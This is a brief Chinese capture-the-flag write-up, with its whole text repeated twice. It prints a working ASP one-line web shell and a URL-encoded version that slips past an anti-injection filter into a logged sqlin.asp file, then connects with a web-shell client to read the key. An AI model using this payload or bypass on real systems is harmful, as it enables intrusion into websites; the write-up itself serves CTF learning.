网上百度得知,access通用防注入系统会把所有记录存到sqlin.asp中
根据题目提示一句话木马,那么这个题其实属于文件上传漏洞,不是SQL注入的范畴了
asp一句话木马
<%eval request("a")%>
直接上传,发现会被过滤掉
用url编码一下:1+and+%3c%25eval+request(%22a%22)%25%3e,成功绕过
直接菜刀无惧链接
找到key
网上百度得知,access通用防注入系统会把所有记录存到sqlin.asp中
根据题目提示一句话木马,那么这个题其实属于文件上传漏洞,不是SQL注入的范畴了
asp一句话木马
<%eval request("a")%>
直接上传,发现会被过滤掉
用url编码一下:1+and+%3c%25eval+request(%22a%22)%25%3e,成功绕过
直接菜刀无惧链接
找到key